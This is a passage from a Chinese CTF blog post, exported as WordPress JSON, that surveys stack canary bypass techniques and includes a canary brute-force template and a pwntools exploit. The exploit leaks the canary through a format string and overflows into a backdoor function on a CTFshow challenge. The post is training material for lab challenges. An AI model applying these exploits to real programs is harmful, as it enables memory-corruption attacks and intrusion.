{"id":465,"date":"2024-12-14T18:24:10","date_gmt":"2024-12-14T10:24:10","guid":{"rendered":"http:\/\/8.141.27.105\/?p=465"},"modified":"2025-01-26T17:08:39","modified_gmt":"2025-01-26T09:08:39","slug":"pwncanary%e7%bb%95%e8%bf%87%e6%80%bb%e7%bb%93","status":"publish","type":"post","link":"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/14\/pwncanary%e7%bb%95%e8%bf%87%e6%80%bb%e7%bb%93\/","title":{"rendered":"PWN|canary\u7ed5\u8fc7\u603b\u7ed3"},"content":{"rendered":"\n<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_71 counter-hierarchy ez-toc-counter ez-toc-transparent ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">\u76ee\u5f55<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" aria-label=\"Toggle Table of Content\"><span class=\"ez-toc-js-icon-con\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #f4f4f4;color:#f4f4f4\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #f4f4f4;color:#f4f4f4\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/span><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/14\/pwncanary%e7%bb%95%e8%bf%87%e6%80%bb%e7%bb%93\/#canary%E4%BF%9D%E6%8A%A4%E6%A6%82%E8%BF%B0%EF%BC%9A\" title=\"canary\u4fdd\u62a4\u6982\u8ff0\uff1a\">canary\u4fdd\u62a4\u6982\u8ff0\uff1a<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/14\/pwncanary%e7%bb%95%e8%bf%87%e6%80%bb%e7%bb%93\/#%E5%A6%82%E4%BD%95%E5%88%A4%E6%96%AD%E7%A8%8B%E5%BA%8F%E6%98%AF%E5%90%A6%E5%BC%80%E5%90%AFcanary%EF%BC%9A\" title=\"\u5982\u4f55\u5224\u65ad\u7a0b\u5e8f\u662f\u5426\u5f00\u542fcanary\uff1a\">\u5982\u4f55\u5224\u65ad\u7a0b\u5e8f\u662f\u5426\u5f00\u542fcanary\uff1a<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/14\/pwncanary%e7%bb%95%e8%bf%87%e6%80%bb%e7%bb%93\/#canary%E7%BB%95%E8%BF%87\" title=\"canary\u7ed5\u8fc7\">canary\u7ed5\u8fc7<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/14\/pwncanary%e7%bb%95%e8%bf%87%e6%80%bb%e7%bb%93\/#%E7%88%86%E7%A0%B4\" title=\"\u7206\u7834\">\u7206\u7834<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/14\/pwncanary%e7%bb%95%e8%bf%87%e6%80%bb%e7%bb%93\/#printf%E6%B3%84%E9%9C%B2canary\" title=\"printf\u6cc4\u9732canary\">printf\u6cc4\u9732canary<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/14\/pwncanary%e7%bb%95%e8%bf%87%e6%80%bb%e7%bb%93\/#%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%B3%84%E9%9C%B2canary\" title=\"\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6cc4\u9732canary\">\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6cc4\u9732canary<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-7\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/14\/pwncanary%e7%bb%95%e8%bf%87%e6%80%bb%e7%bb%93\/#%E5%8A%AB%E6%8C%81_stack_chk_fail%E5%87%BD%E6%95%B0%E7%BB%95%E8%BF%87canary\" title=\"\u52ab\u6301___stack_chk_fail\u51fd\u6570\u7ed5\u8fc7canary\">\u52ab\u6301___stack_chk_fail\u51fd\u6570\u7ed5\u8fc7canary<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-8\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/14\/pwncanary%e7%bb%95%e8%bf%87%e6%80%bb%e7%bb%93\/#%E8%A6%86%E7%9B%96_libc_argv0\" title=\"\u8986\u76d6__libc_argv[0]\">\u8986\u76d6__libc_argv[0]<\/a><\/li><\/ul><\/li><\/ul><\/nav><\/div>\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"canary%E4%BF%9D%E6%8A%A4%E6%A6%82%E8%BF%B0%EF%BC%9A\"><\/span>canary\u4fdd\u62a4\u6982\u8ff0\uff1a<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p><a href=\"https:\/\/ctf-wiki.org\/pwn\/linux\/user-mode\/mitigation\/canary\/\">Canary &#8211; CTF Wiki<\/a><\/p>\n\n\n\n<p><em>\u6211\u4eec\u77e5\u9053\uff0c\u901a\u5e38\u6808\u6ea2\u51fa\u7684\u5229\u7528\u65b9\u5f0f\u662f\u901a\u8fc7\u6ea2\u51fa\u5b58\u5728\u4e8e\u6808\u4e0a\u7684\u5c40\u90e8\u53d8\u91cf\uff0c\u4ece\u800c\u8ba9\u591a\u51fa\u6765\u7684\u6570\u636e\u8986\u76d6 ebp\u3001eip \u7b49\uff0c\u4ece\u800c\u8fbe\u5230\u52ab\u6301\u63a7\u5236\u6d41\u7684\u76ee\u7684\u3002\u6808\u6ea2\u51fa\u4fdd\u62a4\u662f\u4e00\u79cd\u7f13\u51b2\u533a\u6ea2\u51fa\u653b\u51fb\u7f13\u89e3\u624b\u6bb5\uff0c\u5f53\u51fd\u6570\u5b58\u5728\u7f13\u51b2\u533a\u6ea2\u51fa\u653b\u51fb\u6f0f\u6d1e\u65f6\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u8986\u76d6\u6808\u4e0a\u7684\u8fd4\u56de\u5730\u5740\u6765\u8ba9 shellcode \u80fd\u591f\u5f97\u5230\u6267\u884c\u3002\u5f53\u542f\u7528\u6808\u4fdd\u62a4\u540e\uff0c\u51fd\u6570\u5f00\u59cb\u6267\u884c\u7684\u65f6\u5019\u4f1a\u5148\u5f80\u6808\u5e95\u63d2\u5165 cookie \u4fe1\u606f\uff0c\u5f53\u51fd\u6570\u771f\u6b63\u8fd4\u56de\u7684\u65f6\u5019\u4f1a\u9a8c\u8bc1 cookie \u4fe1\u606f\u662f\u5426\u5408\u6cd5 (\u6808\u5e27\u9500\u6bc1\u524d\u6d4b\u8bd5\u8be5\u503c\u662f\u5426\u88ab\u6539\u53d8)\uff0c\u5982\u679c\u4e0d\u5408\u6cd5\u5c31\u505c\u6b62\u7a0b\u5e8f\u8fd0\u884c (\u6808\u6ea2\u51fa\u53d1\u751f)\u3002\u653b\u51fb\u8005\u5728\u8986\u76d6\u8fd4\u56de\u5730\u5740\u7684\u65f6\u5019\u5f80\u5f80\u4e5f\u4f1a\u5c06 cookie \u4fe1\u606f\u7ed9\u8986\u76d6\u6389\uff0c\u5bfc\u81f4\u6808\u4fdd\u62a4\u68c0\u67e5\u5931\u8d25\u800c\u963b\u6b62 shellcode \u7684\u6267\u884c\uff0c\u907f\u514d\u6f0f\u6d1e\u5229\u7528\u6210\u529f\u3002\u5728 Linux \u4e2d\u6211\u4eec\u5c06 cookie \u4fe1\u606f\u79f0\u4e3a Canary\u3002<\/em>                                                                                             <\/p>\n\n\n\n<p>\u6765\u81eactf wiki<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"%E5%A6%82%E4%BD%95%E5%88%A4%E6%96%AD%E7%A8%8B%E5%BA%8F%E6%98%AF%E5%90%A6%E5%BC%80%E5%90%AFcanary%EF%BC%9A\"><\/span>\u5982\u4f55\u5224\u65ad\u7a0b\u5e8f\u662f\u5426\u5f00\u542fcanary\uff1a<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>1.\u901a\u8fc7checksec\u6765\u770b,\u4f46\u662f\u7ecf\u5e38\u4e0d\u51c6\u786e\u3002<\/p>\n\n\n\n<p>2.IDA\u53cd\u6c47\u7f16\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-74.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"615\" height=\"330\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-74.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-466\"  sizes=\"auto, (max-width: 615px) 100vw, 615px\" \/><\/div><\/figure>\n\n\n\n<p>v2\u5f88\u660e\u663e\u5c31\u662f\u4e2acanary\uff0c\u7279\u5f81\u662f\u6700\u540e\u4e00\u884c__readfsqword(0x28u) ^ v2;<\/p>\n\n\n\n<p>\u6c47\u7f16\u4ee3\u7801\u5982\u4e0b\u56fe\u6240\u793a\uff0c\u7ea2\u6846\u5185\u5c31\u662f__readfsqword(0x28u) ^ v2,\u542b\u4e49\u662f\u5c06canary\u4e0e\u521d\u59cb\u503c\u8fdb\u884c\u5f02\u6216\uff0c\u770b\u5224\u65ad\u6ca1\u6709\u88ab\u4fee\u6539\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/EUVXCE@99XV6FJITB43.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"871\" height=\"756\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/EUVXCE@99XV6FJITB43.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-467\"  sizes=\"auto, (max-width: 871px) 100vw, 871px\" \/><\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"canary%E7%BB%95%E8%BF%87\"><\/span>canary\u7ed5\u8fc7<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"%E7%88%86%E7%A0%B4\"><\/span><strong>\u7206\u7834<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>\u7206\u7834canary\u7684\u6761\u4ef6\u975e\u5e38\u82db\u523b\uff0c\u56e0\u4e3acanary\u7684\u8fd0\u884c\u673a\u5236\u662f\u53ea\u8981\u68c0\u6d4b\u5230canary\u6709\u88ab\u7be1\u6539\uff0c\u7a0b\u5e8f\u5c31\u4f1a\u76f4\u63a5\u4e2d\u6b62\u3002\u901a\u5e38\u8981\u7206\u7834canary\u7684\u60c5\u51b5\u662f\u7528\u4e00\u4e2awhile\u6b7b\u5faa\u73af\u6765\u8c03\u7528fork\u51fd\u6570\u521b\u5efa\u5b50\u8fdb\u7a0b\uff0c\u5b50\u8fdb\u7a0b\u7684canary\u8ddf\u7236\u8fdb\u7a0b\u4e00\u81f4\uff0c\u5b50\u7a0b\u5e8f\u4e2d\u6b62\u540e\u56de\u5230\u7236\u8fdb\u7a0b\u7ee7\u7eed\u521b\u5efa\u5b50\u8fdb\u7a0b\uff0c\u6240\u4ee5\u624d\u5177\u5907\u7206\u7834canary\u7684\u53ef\u80fd\u6027\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/PIR92ALX6HE08K1D47X.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"323\" height=\"358\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/PIR92ALX6HE08K1D47X.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-468\" style=\"width:439px;height:auto\"  sizes=\"auto, (max-width: 323px) 100vw, 323px\" \/><\/div><\/figure>\n\n\n\n<p>\u7206\u7834\u6a21\u677f\uff0864\u4f4d\uff09\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>canary = b'\\x00'\nfor k in range(7):\n    for i in range(256):\n        payload = b'a' * 0x68 + canary + bytes(&#91;i])\n        io.send(payload)\n        data = io.recvuntil('welcome\\n')\n        print(data)\n        if b\"fun\" in data:\n          canary += bytes(&#91;i])\n          print(\"canary is:\" + str(canary))\n          break<\/code><\/pre>\n\n\n\n<p>\u4f8b\u9898\u8be6\u89c1\uff1a2023CISCN funcanary:<\/p>\n\n\n\n<p><a href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/13\/2024%e5%9b%bd%e5%9f%8e%e6%9d%af-pwn%e9%83%a8%e5%88%86wp-2\/\">2023CISCN PWN\u90e8\u5206WP \u2013 n0ps1ed&#8217;s website<\/a><\/p>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"printf%E6%B3%84%E9%9C%B2canary\"><\/span><strong>printf\u6cc4\u9732canary<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>\u5229\u7528printf\u4e0d\u9047\u5230\\x00\u4e0d\u7ec8\u6b62\u7684\u7279\u70b9\uff0c\u5982\u679c\u628acanary\u7684\u6700\u4f4e\u5b57\u8282\\x00\u8986\u76d6\u4e86\uff0c\u5c31\u80fd\u5728\u6253\u5370\u65f6\u5019\u987a\u5e26\u628a\u5b83\u6253\u5370\u51fa\u6765\uff0c\u7136\u540e\u51cf\u53bb\u7528\u6765\u8986\u76d6\\x00\u7684\u90a3\u4e00\u5b57\u8282\u7684\u503c\uff0c\u5c31\u80fd\u5f97\u5230canary\u539f\u503c\u3002<\/p>\n\n\n\n<p>\u4f8b\u9898\uff1a<\/p>\n\n\n\n<p><a href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/13\/%e6%9f%90%e6%a0%a1%e7%bd%91%e5%ae%89%e5%ae%9e%e8%b7%b5%e4%b8%89%e6%af%94%e8%b5%9bpwn\/\">\u67d0\u6821\u7f51\u5b89\u5b9e\u8df5(\u4e09)\u6bd4\u8d5b|PWN \u2013 n0ps1ed&#8217;s website<\/a>\uff08\u7b2c\u4e8c\u9898\uff09<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%B3%84%E9%9C%B2canary\"><\/span><strong>\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6cc4\u9732canary<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u6765\u7cbe\u51c6\u6cc4\u9732canary<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>\u4f8b\u9898\uff1aCTFSHOW PWN\u5165\u95e8 PWN98<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-75.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"333\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-75.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-469\"  sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u19bf00ae\">\u5f88\u660e\u663e\u7684fmt\u548cstack overflow\u3002\u800c\u4e14\u5f88\u5bb9\u6613\u770b\u51fa\u6765\u8fd9v2\u5c31\u662fcanary<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-77.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1014\" height=\"453\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-77.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-471\"  sizes=\"auto, (max-width: 1014px) 100vw, 1014px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u6b1dd7d4\">var_C\u5c31\u662fv2\uff0c\u5c06\u5b83\u4e0elarge gs:14h\u8fdb\u884c\u5f02\u6216\u64cd\u4f5c\uff0c\u7b49\u4e8e0\u5c31\u901a\u8fc7\u68c0\u6d4b\uff0c\u4e5f\u5c31\u662f\u770b\u8fd9\u4e24\u76f8\u4e0d\u76f8\u7b49\u3002<\/p>\n\n\n\n<p id=\"u4f0afbd2\">\u504f\u79fb\u662f5\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-76.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"756\" height=\"222\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-76.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-470\"  sizes=\"auto, (max-width: 756px) 100vw, 756px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u0e07f528\">s\u670940\u5b57\u8282\uff0c32\u4f4d\u7684\u8bdd\u662f4\u5b57\u8282\u4e00\u5355\u4f4d\uff0c\u90a3\u5c31\u662f\u5341\u4e2a\u5355\u4f4d\uff0c\u52a0\u4e0a\u504f\u79fb\u76845\u5c31\u662f15<\/p>\n\n\n\n<p id=\"u8b9a0883\">\u6c42canary1,canary2,canary3:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>payload=b'%14$p%15$p%16$p'\n\np.sendline(payload)\n\np.recvuntil('0x')\n\ncanary1=b'0x'+p.recvuntil('0x',drop=True)\n\ncanary2=b'0x'+p.recvuntil('0x',drop=True)\n\ncanary3=b'0x'+p.recv()\n\nprint(canary1)\n\nprint(canary2)\n\nprint(canary3)<\/code><\/pre>\n\n\n\n<p id=\"u2b284d41\"><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-79.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"968\" height=\"735\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-79.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-473\"  sizes=\"auto, (max-width: 968px) 100vw, 968px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u886163f8\">\u4f46\u662f\u884c\u4e0d\u901a\uff0c\u540e\u6765\u53d1\u73b0\u72af\u4e86\u4e2a\u4f4e\u7ea7\u9519\u8bef\uff0ccanary\u662f\u4f4d\u7f6e\u5728ebp-0xC\uff0c\u5b83\u957f\u5ea6\u53c8\u4e0d\u662f0xC\uff0c\u53ea\u662f4\u5b57\u8282\u800c\u5df2\uff0c\u6240\u4ee5\u76f4\u63a5\u5c31\u662f%15$p<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-78.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"633\" height=\"339\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-78.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-472\"  sizes=\"auto, (max-width: 633px) 100vw, 633px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-80-1024x497.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"497\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-80-1024x497.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-474\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import*\n\nfrom LibcSearcher import*\n\n#\u8fde\u63a5\u8fdc\u7a0b\n\ncontext(arch = 'i386',os = 'linux',log_level = 'debug')\n\np=remote(\"pwn.challenge.ctf.show\",28260)\n\nelf=ELF('\/home\/monke\/ctfshowpwn\/pwn')\n\n#\u6c42canary\n\npayload=b'%14$p%15$p%16$p'\n\np.sendline(payload)\n\np.recvuntil('0x')\n\ncanary1=b'0x'+p.recvuntil('0x',drop=True)\n\ncanary2=b'0x'+p.recvuntil('0x',drop=True)\n\ncanary3=b'0x'+p.recv()\n\nprint(canary1)\n\nprint(canary2)\n\nprint(canary3)\n\nbackdoor= elf.sym&#91;'__stack_check']\n\npayload2=cyclic(36)+p32(int(canary1,16))+p32(int(canary2,16))+p32(int(canary3,16))+cyclic(8)+p32(backdoor)\n\np.sendline(payload2)\n\np.interactive()\n\n<\/code><\/pre>\n\n\n\n<p id=\"uffb084b4\">\u6211\u7684exp\u91cc\u9762canary1\u548ccanary3\u90fd\u662f\u4e0d\u5fc5\u8981\u7684\uff0c\u6539\u4e0d\u6539\u90fd\u884c\u3002<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" 